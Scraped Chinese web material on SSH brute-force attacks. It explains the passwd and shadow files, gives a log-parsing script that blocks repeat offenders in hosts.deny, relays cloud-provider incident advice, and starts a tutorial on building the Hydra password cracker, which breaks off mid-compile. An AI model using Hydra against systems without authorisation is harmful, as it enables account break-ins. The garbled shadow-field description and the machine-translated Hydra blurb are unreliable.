linux服务器遭到暴力破解服务器密码怎么处理

点击联系发帖人 时间：2015-01-02 10:46

linux 防暴力破解

一、关于暴力破解
前几天新购进了一台阿里云服务器，使用过程中时常会收到&主机被暴力破解&的警告，警告信息如下：
云盾用户您好！您的主机:... 正在被暴力破解，系统已自动启动破解保护。详情请登录/dashboard/instance?type=yundun.
通常暴力破解的是采用穷举字典的方式尝试远程登陆，也就是我们所说的&猜&密码的方法。
Linux系统安装完后，超级管理员默认的用户名是root，阿里云服务器的默认级管理员也是root，通常提升安全的做法是修改root帐户的登陆名，可以增加破解难度，修改用户名后阿里云服务器的&主机被暴力破解&也不会再提示。
修改用户名和密码有两个相关配置文件：/etc/passwd、/etc/shadow，下面会对这两个文件进行详述。
二、passwd文件
passwd文件的位置在/etc/passwd，该配置文件存放了Linux所有帐号的信息，包括用户名、密码、用户识别码、用户组识别码、注释、宿主目录等，可以使用&cat /etc/passwd&命令查看该文件。
passwd文件每行记录表示一个用户帐户，由7个字段组成，用冒号分隔，格式如下：
username:password:User ID:Group ID:comment:home directory:shell
字段含义如下：
■ username
用户名，它唯一地标识了一个用户帐号。
■&password
用户密码，这里用x表示，真实的密码存放在/etc/shadow对应记录行中。(最早期Linux系统的用户密码是放在此处哦)
■&User ID 　
用户识别码，简称UID。Linux系统内部使用UID来标识用户，而不是用户名。
UID是一个整数，用户的UID互不相同，比如root用户的UID：0；普通用户UID：500-60000；伪用户：1-499，如上图，系统安装后会有一些默认伪用户，用于执行对应进程程序。
■&Group ID
用户组识别码，简称GID，对应的用户组存放在/etc/group文件的记录行中。不同的用户可以属于同一个用户组，享有该用户组共有的权限。与UID类似，GID唯一地标识了一个用户组。
■&comment
用户注释，可以为空。可以存放用户全名或其它一些信息
■&home directory
用户宿主目录，用户登陆后的缺省目录。一般来说，root帐号的主目录是/root，其他帐号的家目录都在/home目录下，并且和用户名同名。
■&login command
命令解释器，默认为bash shell。如上图，部份用户记录行的命令解释器为：/sbin/nologin，意思是指该用户是不可登系统的。
三、shadow文件
shadow文件的位置在/etc/shadow，该配置文件存放了Linux所有帐号的信息，只有root权限才可以浏览，包括用户名、最后一次修改时间、最小时间间隔、最大时间间隔、警告时间、帐户闲置时间、失效时间、标志等，可以使用&cat /etc/shadow&命令查看该文件。
shadow文件每行记录表示一个用户帐户，由9个字段组成，用冒号分隔，各字段含义如下：&
■&username
用户名，它唯一地标识了一个用户帐号。
■&password
用户密码，己用MD5进行加密。如果该字段为空*，如果该字段为空!!，如果该字段为空，用户可以不需要密码就可以登陆。
■&Days since epoch of last password change
最后一次修改时间，用户最后一次修改密码的天数，以为参考点进行计算。
■&Days until change allowed
最小时间间隔，两次修改密码之间的最小天数，如果该字段为0，表示不限定。
■&Days before change required
最大时间间隔，密码保持有效的最多天数，如果该字段为99999，表示不限定。
■&Days warning for expiration
警告时间，从系统开始警告到密码失效的天数。
■&Days before account inactive
帐号闲置时间，判断用户多久未登陆，如果该字段为空，表示未闲置。
■&Days since Epoch when account expires
失效时间，密码失效的绝对天数，如果该字段为空，表示未失效。
■&Reserved
保留位，一般不使用。
四、相关配置和命令
该命令将所有用户密码从/etc/passwd移动到/etc/shadow中。
■&pwunconv
该命令将所有用户密码从/etc/shadow恢复到/etc/passwd中。
■ /etc/skel
所有新创建用户的信息配置文件在该目录下，新建用户时会拷贝该目录下的所有文件到新建用户的宿主目录，默认是隐藏的。
■&/etc/login.defs
该配置文件是设置用户帐号限制的文件，这里的配置对root用户无效。如果/etc/shadow文件里有相同的选项，则以/etc/shadow里的设置为准，也就是说/etc/shadow的配置优先级高于/etc/login.defs。
■&/etc/default/useradd
该配置文件是设置新建用户时的缺省选项。
■&/etc/motd
该配置文件是设置用户登陆时的提示信息。
阅读(...) 评论()SSH访问控制,多次失败登录即封掉IP,防止暴力破解_服务器应用_Linux公社-Linux系统门户网站
你好，游客
SSH访问控制,多次失败登录即封掉IP,防止暴力破解
来源：Linux社区&
作者：panblack
一、系统： 6.3 64位
二、方法：读取/var/log/secure，查找关键字 Failed，例如（注：文中的IP地址特意做了删减）：
Sep 17 09:08:09 localhost sshd[29087]: Failed password for root from 13.7.3.6 port 44367 ssh2Sep 17 09:08:20 localhost sshd[29087]: Failed password for root from 13.7.3.6 port 44367 ssh2Sep 17 09:10:02 localhost sshd[29223]: Failed password for root from 13.7.3.6 port 56482 ssh2Sep 17 09:10:14 localhost sshd[29223]: Failed password for root from 13.7.3.6 port 56482 ssh2
从这些行中提取IP地址，如果次数达到5次则将该IP写到 /etc/hosts.deny中。
三、步骤：
1、先把始终允许的IP填入 /etc/hosts.allow ，这很重要！比如：sshd:19.16.18.1:allowsshd:19.16.18.2:allow
2、脚本 /root/secure_ssh.sh
#! /bin/bashcat /var/log/secure|awk '/Failed/{print $(NF-3)}'|sort|uniq -c|awk '{print $2"="$1;}' & /root/black.txtDEFINE="5"for i in `cat& /root/black.txt`do　　IP=`echo $i |awk -F= '{print $1}'`　　NUM=`echo $i|awk -F= '{print $2}'`　　if [ $NUM -gt $DEFINE ];then&
　　grep $IP /etc/hosts.deny & /dev/null& & & if [ $? -gt 0 ];then& & & & & echo "sshd:$IP:deny" && /etc/hosts.deny& & & fi& & fidone
3、将secure_ssh.sh脚本放入cron计划任务，每1分钟执行一次。# crontab -e*/1 * * * *& sh /root/secure_ssh.sh
四、测试：
1、开两个终端窗口，一个ssh连上服务器，另一个用错误的密码连接服务器几次。
很快，服务器上黑名单文件里已经有记录了：[root@ ~]# $ cat /root/black.txt 13.26.21.27=3
再看看服务器上的hosts.deny[root@ ~]# cat /etc/hosts.denysshd:13.7.3.6:denysshd:92.4.0.4:denysshd:94.10.4.2:denysshd:94.4.1.6:denysshd:11.64.11.5:deny
2、从另一个终端窗口继续&暴力&连接服务器。
看看服务器上的黑名单文件：[root@ ~]# cat black.txt13.26.21.27=6
再看看服务器上的hosts.deny[root@ ~]# cat /etc/hosts.denysshd:13.7.3.6:denysshd:92.4.0.4:denysshd:94.10.4.2:denysshd:94.4.1.6:denysshd:11.64.11.5:denysshd:13.26.21.27:deny
IP 已经被加入到服务器的hosts.deny，再用正确的密码连接服务器，被拒绝：$ ssh root@ -p 2333ssh_exchange_identification: Connection closed by remote host
注：1.脚本为同事编写。
2.服务器sshd端口已改为2333，事实证明，改了端口后，暴力破解的ssh连接数锐减。
提高的SSH登陆认证速度的办法
开启SSH服务让手机远程访问 Ubuntu 14.04&
如何为Linux系统中的SSH添加双重认证
在 Linux 中为非 SSH 用户配置 SFTP 环境
Linux 上SSH 服务的配置和管理
SSH入门学习基础教程
本文永久更新链接地址：
相关资讯 & & &
& (12月15日)
& (11月23日)
& (12月20日)
& (12月15日)
& (11月16日)
图片资讯 & & &
　　　同意评论声明
　　　发表
尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款服务器被入侵/服务器行为异常的解决方案
（1）登陆服务器分析是否有可疑进程或可疑的数据发送行为（可使用tcpdump抓包分析），如有则停掉对应进程；
（2）登陆“：暴力破解告警”查看服务器是否有被暴力破解成功的记录。如有则提高密码强度（至少10位字符，包括：大小写字母、数字、符号），或使用公匙方式登陆（配置秘钥登录步骤请参见：，秘钥登录步骤请参见：）；
（3）登陆“：后门木马检测”查看自己的机器是否有后门木马程序。如有则删除；
（4）登陆“：漏洞扫描”查看网站是否存在漏洞。如有则进行修复，并务必接入“：网站安全防护（WAF）“以对网站开启实时防护（详情请参见：）；
（5）如使用的Windows操作系统，请务必安装QQ管家进行病毒查杀；
（6）如服务器上安装了第三方软件，请在软件官网上查看软件是否存在漏洞，如有请按照官网指引进行修复；
（7）如经过以上步骤都还是不能解决问题，请尝试重装操作系统，并重新进行以上的步骤。
特别说明：
（1）已被隔离的机器，只有内网的22、3端口可访问（也就是说只能通过跳板机的方式登陆CVM），登陆方式为：
o windows机器：
o linux机器：
（2）“云安全违规事件的等级划分及处罚说明”请参见：。
Copyright (C)
. All Rights Reserved. 腾讯云版权所有
京公网安备 18
京ICP证150476号首先还是书写本文的参考档：/mchina/archive//2840815.html工具介绍：原文为官方英文解释本人给翻译下&数量最大的漏洞之一是密码，每个密码研究显示。&Hydra是一个parallized登录的裂解装置，它支持众多的协议来攻击。新的模块很容易的添加，旁边，它是灵活的，而且速度非常快。水润测试上的，/ Cygwin的中，Solaris 11中的FreeBSD8.1和OSX，可根据GPLv3的一个特殊的OpenSSL许可证授权扩展。目前该工具支持：AFP，使，认证，思科AAA，CVS，火鸟，FTP，HTTP-FORM-GET，HTTP-FORM-POST，HTTP-GET，HTTP头，HTTP代理，HTTPS-FORM-GET，HTTPS-FORM&POST，IMAP，HTTP代理，HTTPS的GET，HTTPS头，ICQ，IRC，LDAP，MS-SQL，，NCP，NNTP，的监听器，的SID，甲骨文，PCAnywhere中，PCNFS，POP3，POSTGRES，RDP，REXEC，Rlogin的，RSH，SAP/R3，SIP，SMB，SMTP，SNMP，SMTP枚举，SOCKS5，SSH（v1和v2），颠覆，使用TeamSpeak（TS2），远程登录，VMware的认证，VNC和XMPP。对于HTTP，POP3，IMAP和SMTP，支持几个登录机制，如平原和MD5摘要等。这个工具是一个概念证明，给研究人员和安全顾问可行显示，这将是多么容易获得未经授权的访问从远程系统。面包车豪斯和大卫Maciejak的维护。黑客选择http://www.thc.org/thc-hydra本人的实验环境借用了 6.3 这里注明下本人刚接触Linux是RHEL也就是RedHad的企业版本。了解CentOS后知道为rhel的克隆版理论是兼容rhel的所有包的所以该下演示的步骤和包同样可用在rhel的OS上。假如你的是RHEL的但为激活使用可以参考本人的博文 RHEL使用centos的源修改教程：/patf/articles/3137348.html废话不多说首先安装的是hydra的支持库包1 yum -y install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel sub-devel libncurses-devel 假如-y选项，因为本人在安装的时候没有加入所以有两三次提示我 -y可以默认yes 1
: subversion-devel-1.6.11-9.el6_4.i686
: db4-cxx-4.7.25-17.el6.i686
: postgresql-libs-8.4.13-1.el6_3.i686
: openldap-devel-2.4.23-32.el6_4.1.i686
: cyrus-sasl-plain-2.1.23-13.el6_3.1.i686
: openldap-2.4.23-32.el6_4.1.i686
: krb5-workstation-1.10.3-10.el6_4.3.i686
: cyrus-sasl-lib-2.1.23-13.el6_3.1.i686
: postgresql-devel-8.4.13-1.el6_3.i686
: expat-devel-2.0.1-11.el6_2.i686
: libcom_err-devel-1.41.12-14.el6.i686
: krb5-devel-1.10.3-10.el6_4.3.i686
: krb5-libs-1.10.3-10.el6_4.3.i686
: cyrus-sasl-2.1.23-13.el6_3.1.i686
: cyrus-sasl-lib-2.1.23-13.el6.i686
: cyrus-sasl-2.1.23-13.el6.i686
: libss-1.41.12-12.el6.i686
: openssl-1.0.0-20.el6_2.5.i686
: subversion-1.6.11-7.el6.i686
: cyrus-sasl-gssapi-2.1.23-13.el6.i686
: e2fsprogs-1.41.12-12.el6.i686
: openldap-2.4.23-26.el6.i686
: libcom_err-1.41.12-12.el6.i686
: zlib-1.2.3-27.el6.i686
: pcre-7.8-4.el6.i686
: libselinux-2.0.94-5.3.el6.i686
: cyrus-sasl-plain-2.1.23-13.el6.i686
: libselinux-utils-2.0.94-5.3.el6.i686
: libselinux--2.0.94-5.3.el6.i686
: krb5-workstation-1.9-33.el6.i686
: krb5-libs-1.9-33.el6.i686
: e2fsprogs-libs-1.41.12-12.el6.i686
: apr-1.3.9-3.el6_1.2.i686
: cyrus-sasl-md5-2.1.23-13.el6.i686
59/59 35 36 Installed:37
openssl-devel.i686 0:1.0.0-27.el6_4.2
pcre-devel.i686 0:7.8-6.el6
postgresql-devel.i686 0:8.4.13-1.el6_3
subversion-devel.i686 0:1.6.11-9.el6_4
39 40 Dependency Installed:41
apr-devel.i686 0:1.3.9-5.el6_2
apr-util-devel.i686 0:1.3.9-3.el6_0.1
cyrus-sasl-devel.i686 0:2.1.23-13.el6_3.1
db4-cxx.i686 0:4.7.25-17.el6
db4-devel.i686 0:4.7.25-17.el6
expat-devel.i686 0:2.0.1-11.el6_2
keyutils-libs-devel.i686 0:1.4-4.el6
krb5-devel.i686 0:1.10.3-10.el6_4.3
libcom_err-devel.i686 0:1.41.12-14.el6
libselinux-devel.i686 0:2.0.94-5.3.el6_4.1
libsepol-devel.i686 0:2.0.41-4.el6
openldap-devel.i686 0:2.4.23-32.el6_4.1
postgresql.i686 0:8.4.13-1.el6_3
postgresql-libs.i686 0:8.4.13-1.el6_3
zlib-devel.i686 0:1.2.3-29.el6
49 50 Dependency d:51
apr.i686 0:1.3.9-5.el6_2
cyrus-sasl.i686 0:2.1.23-13.el6_3.1
cyrus-sasl-gssapi.i686 0:2.1.23-13.el6_3.1
cyrus-sasl-lib.i686 0:2.1.23-13.el6_3.1
cyrus-sasl-md5.i686 0:2.1.23-13.el6_3.1
cyrus-sasl-plain.i686 0:2.1.23-13.el6_3.1
e2fsprogs.i686 0:1.41.12-14.el6
e2fsprogs-libs.i686 0:1.41.12-14.el6
krb5-libs.i686 0:1.10.3-10.el6_4.3
krb5-workstation.i686 0:1.10.3-10.el6_4.3
libcom_err.i686 0:1.41.12-14.el6
libselinux.i686 0:2.0.94-5.3.el6_4.1
libselinux-.i686 0:2.0.94-5.3.el6_4.1
libselinux-utils.i686 0:2.0.94-5.3.el6_4.1 58
libss.i686 0:1.41.12-14.el6
openldap.i686 0:2.4.23-32.el6_4.1
openssl.i686 0:1.0.0-27.el6_4.2
pcre.i686 0:7.8-6.el6
subversion.i686 0:1.6.11-9.el6_4
zlib.i686 0:1.2.3-29.el6
61 62 Complete!到这里所以支持都安装完毕下面可以安装hydra了可以到官方找最新的包也可以按一下的方法下载
1 @ ~]# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz
2 -- 23:02:32--
http://www.thc.org/releases/hydra-7.4.1.tar.gz
3 正在解析主机 www.thc.org... 199.58.210.16
4 正在连接 www.thc.org|199.58.210.16|:80... 已连接。
5 已发出 HTTP 请求，正在等待回应... 200 OK
6 长度：1K) [application/x-gzip]
7 正在保存至: &hydra-7.4.1.tar.gz&
9 17% [==================&
35.6K/s eta(英国中部时19% [=====================&
38.3K/s eta(英国中部时23% [=========================&
41.7K/s eta(英国中部时28% [===============================&
47.6K/s eta(英国中部时34% [======================================&
53.7K/s eta(英国中部时36% [=========================================&
55.1K/s eta(英国中部时41% [==============================================&
58.6K/s eta(英国中部时46% [====================================================&
63.2K/s eta(英国中部时48% [======================================================&
62.4K/s eta(英国中部时53% [============================================================&
69.5K/s eta(英国中部时57% [=================================================================&
73.0K/s eta(英国中部时61% [=====================================================================&
83.8K/s eta(英国中部时62% [======================================================================&
82.7K/s eta(英国中部时71% [================================================================================&
95.3K/s eta(英国中部时74% [====================================================================================&
99.8K/s eta(英国中部时77% [=======================================================================================&
96.8K/s eta(英国中部时83% [===============================================================================================&
104K/s eta(英国中部时86% [==================================================================================================&
104K/s eta(英国中部时89% [=====================================================================================================&
95.4K/s eta(英国中部时94% [===========================================================================================================&
99.9K/s eta(英国中部时97% [===============================================================================================================&
98.4K/s eta(英国中部时100%[==================================================================================================================&] 666,187
23:02:41 (75.8 KB/s) - 已保存 &hydra-7.4.1.tar.gz& [187]) 12
13 [@localhost ~]# tar zxvf hydra-7.4.1.tar.gz
14 hydra-7.4.2/ 15 hydra-7.4.2/bfg.c 16 hydra-7.4.2/bfg.h 17 hydra-7.4.2/CHANGES 18 hydra-7.4.2/configure 19 hydra-7.4.2/crc32.c 20 hydra-7.4.2/crc32.h 21 hydra-7.4.2/d3des.c 22 hydra-7.4.2/d3des.h 23 hydra-7.4.2/dpl4hydra.sh 24 hydra-7.4.2/dpl4hydra_full.csv 25 hydra-7.4.2/dpl4hydra_local.csv 26 hydra-7.4.2/hmacmd5.c 27 hydra-7.4.2/hmacmd5.h 28 hydra-7.4.2/hydra-afp.c 29 hydra-7.4.2/hydra--enable.c 30 hydra-7.4.2/hydra-.c 31 hydra-7.4.2/hydra-cvs.c 32 hydra-7.4.2/hydra-firebird.c 33 hydra-7.4.2/hydra-ftp.c 34 hydra-7.4.2/hydra-gtk/ 35 hydra-7.4.2/hydra-gtk/acconfig.h 36 hydra-7.4.2/hydra-gtk/aclocal.m4 37 hydra-7.4.2/hydra-gtk/AUTHORS 38 hydra-7.4.2/hydra-gtk/autogen.sh 39 hydra-7.4.2/hydra-gtk/ChangeLog 40 hydra-7.4.2/hydra-gtk/config.h 41 hydra-7.4.2/hydra-gtk/config.h.in 42 hydra-7.4.2/hydra-gtk/configure 43 hydra-7.4.2/hydra-gtk/configure.in 44 hydra-7.4.2/hydra-gtk/COPYING 45 hydra-7.4.2/hydra-gtk/INSTALL 46 hydra-7.4.2/hydra-gtk/install-sh 47 hydra-7.4.2/hydra-gtk/Makefile.am 48 hydra-7.4.2/hydra-gtk/Makefile.in 49 hydra-7.4.2/hydra-gtk/make_xhydra.sh 50 hydra-7.4.2/hydra-gtk/missing 51 hydra-7.4.2/hydra-gtk/mkinstalldirs 52 hydra-7.4.2/hydra-gtk/NEWS 53 hydra-7.4.2/hydra-gtk/README 54 hydra-7.4.2/hydra-gtk/src/ 55 hydra-7.4.2/hydra-gtk/src/callbacks.c 56 hydra-7.4.2/hydra-gtk/src/callbacks.h 57 hydra-7.4.2/hydra-gtk/src/.c 58 hydra-7.4.2/hydra-gtk/src/interface.h 59 hydra-7.4.2/hydra-gtk/src/main.c 60 hydra-7.4.2/hydra-gtk/src/Makefile.am 61 hydra-7.4.2/hydra-gtk/src/Makefile.in 62 hydra-7.4.2/hydra-gtk/src/support.c 63 hydra-7.4.2/hydra-gtk/src/support.h 64 hydra-7.4.2/hydra-gtk/stamp-h.in 65 hydra-7.4.2/hydra-gtk/xhydra.glade 66 hydra-7.4.2/hydra-gtk/xhydra.gladep 67 hydra-7.4.2/hydra-http-m.c 68 hydra-7.4.2/hydra-http-proxy-urlenum.c 69 hydra-7.4.2/hydra-http-proxy.c 70 hydra-7.4.2/hydra-http.c 71 hydra-7.4.2/hydra-icq.c 72 hydra-7.4.2/hydra-imap.c 73 hydra-7.4.2/hydra-irc.c 74 hydra-7.4.2/hydra-ldap.c 75 hydra-7.4.2/hydra-logo.ico 76 hydra-7.4.2/hydra-logo.rc 77 hydra-7.4.2/hydra-mod.c 78 hydra-7.4.2/hydra-mod.h 79 hydra-7.4.2/hydra-mssql.c 80 hydra-7.4.2/hydra-.c 81 hydra-7.4.2/hydra-ncp.c 82 hydra-7.4.2/hydra-nntp.c 83 hydra-7.4.2/hydra--listener.c 84 hydra-7.4.2/hydra--sid.c 85 hydra-7.4.2/hydra-oracle.c 86 hydra-7.4.2/hydra-pcanywhere.c 87 hydra-7.4.2/hydra-pcnfs.c 88 hydra-7.4.2/hydra-pop3.c 89 hydra-7.4.2/hydra-postgres.c 90 hydra-7.4.2/hydra-rdp.c 91 hydra-7.4.2/hydra-rexec.c 92 hydra-7.4.2/hydra-rlogin.c 93 hydra-7.4.2/hydra-rsh.c 94 hydra-7.4.2/hydra-sapr3.c 95 hydra-7.4.2/hydra-sip.c 96 hydra-7.4.2/hydra-smb.c 97 hydra-7.4.2/hydra-smtp-enum.c 98 hydra-7.4.2/hydra-smtp.c 99 hydra-7.4.2/hydra-snmp.c100 hydra-7.4.2/hydra-socks5.c101 hydra-7.4.2/hydra-ssh.c102 hydra-7.4.2/hydra-sshkey.c103 hydra-7.4.2/hydra-.c104 hydra-7.4.2/hydra-teamspeak.c105 hydra-7.4.2/hydra-telnet.c106 hydra-7.4.2/hydra-vmauthd.c107 hydra-7.4.2/hydra-vnc.c108 hydra-7.4.2/hydra-xmpp.c109 hydra-7.4.2/hydra.1110 hydra-7.4.2/hydra.c111 hydra-7.4.2/hydra.h112 hydra-7.4.2/INSTALL113 hydra-7.4.2/libpq-fe.h114 hydra-7.4.2/LICENSE115 hydra-7.4.2/LICENSE.OPENSSL116 hydra-7.4.2/Makefile117 hydra-7.4.2/Makefile.am118 hydra-7.4.2/Makefile.orig119 hydra-7.4.2/Makefile.unix120 hydra-7.4.2/ntlm.c121 hydra-7.4.2/ntlm.h122 hydra-7.4.2/permance.h123 hydra-7.4.2/postgres_ext.h124 hydra-7.4.2/pw-inspector-logo.rc125 hydra-7.4.2/pw-inspector.1126 hydra-7.4.2/pw-inspector.c127 hydra-7.4.2/pw-inspector.ico128 hydra-7.4.2/rdp.h129 hydra-7.4.2/README130 hydra-7.4.2/sasl.c131 hydra-7.4.2/sasl.h132 hydra-7.4.2/xhydra.1133 hydra-7.4.2/xhydra.png134 [root@localhost ~]# cd hydra-7.4.135 -: cd: hydra-7.4.: 没有那个文件或目录136 [root@localhost ~]# cd hydra-7.4.137 hydra-7.4.1.tar.gz
hydra-7.4.2/
138 [root@localhost ~]# cd hydra-7.4.2/这里有点搞笑了，下载了一个7.4.1的包解压是4.2的源呵呵不管了反正新的包是向下兼容的进入到里面./configure --help下查看下也没什么直接./configure &然后无报错就直接 make &&make install 即可
1 root@localhost hydra-7.4.2]# ./configure
3 Starting hydra auto configuration ...
4 Detected 32 Bit Linux OS
6 Checking for openssl (libssl, libcrypto, ssl.h, sha.h) ...
8 Checking for idn (libidn.so) ...
... NOT found, unicode logins and passwords will not be supported 10 Checking for curses (libcurses.so / term.h) ... 11
... NOT found, color output disabled 12 Checking for pcre (libpcre.so, pcre.h) ... 13
... found 14 Checking for Postgres (libpq.so, libpq-fe.h) ... 15
... found 16 Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) ... 17
... found 18 Checking for firebird (libfbclient.so) ... 19
... NOT found, module firebird disabled 20 Checking for MYSQL client (libmysqlclient.so, math.h) ... 21
... NOT found, module Mysql will not support version & 4.x 22 Checking for AFP (libafpclient.so) ... 23
... NOT found, module
Filing Protocol disabled - Apple sucks anyway 24 Checking for NCP (libncp.so / nwcalls.h) ... 25
... NOT found, module NCP disabled 26 Checking for SAP/R3 (librfc/saprfc.h) ... 27
... NOT found, module sapr3 disabled 28 Get it from /solutions/netweaver/linux/eval/index.asp 29 Checking for libssh (libssh/libssh.h) ... 30
... NOT found, module ssh disabled 31 Get it from http://www.libssh.org 32 Checking for Oracle (libocci.so libclntsh.so / oci.h and libaio.so) ... 33
... NOT found, module Oracle disabled 34 Get basic and sdk
from /tech//features/instant-client/index.html 35 Checking for GUI req's (pkg-config, gtk+-2.0) ... 36
... NOT found, optional anyway 37
38 Hydra will be installed into .../ of: /usr/local 39
(change this by running ./configure --prefix=path) 40
41 Writing Makefile.in ... 42 now type "make" 43 [root@localhost hydra-7.4.2]# make && make install 44 gcc -I. -O3
-o pw-inspector
pw-inspector.c 45 gcc -I. -O3
-c hydra-vnc.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 46 gcc -I. -O3
-c hydra-pcnfs.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 47 gcc -I. -O3
-c hydra-rexec.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 48 gcc -I. -O3
-c hydra-nntp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 49 gcc -I. -O3
-c hydra-socks5.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 50 gcc -I. -O3
-c hydra-telnet.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 51 gcc -I. -O3
-c hydra-cisco.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 52 gcc -I. -O3
-c hydra-http.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 53 gcc -I. -O3
-c hydra-ftp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 54 gcc -I. -O3
-c hydra-imap.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 55 gcc -I. -O3
-c hydra-pop3.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 56 gcc -I. -O3
-c hydra-smb.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 57 gcc -I. -O3
-c hydra-icq.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 58 gcc -I. -O3
-c hydra-cisco-enable.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 59 gcc -I. -O3
-c hydra-ldap.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 60 gcc -I. -O3
-c hydra-mysql.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 61 gcc -I. -O3
-c hydra-mssql.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 62 gcc -I. -O3
-c hydra-xmpp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 63 gcc -I. -O3
-c hydra-http-proxy-urlenum.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 64 gcc -I. -O3
-c hydra-snmp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 65 gcc -I. -O3
-c hydra-cvs.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 66 gcc -I. -O3
-c hydra-smtp.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 67 gcc -I. -O3
-c hydra-smtp-enum.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 68 gcc -I. -O3
-c hydra-sapr3.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 69 gcc -I. -O3
-c hydra-ssh.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 70 gcc -I. -O3
-c hydra-sshkey.c -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 71 gcc -I. -O3
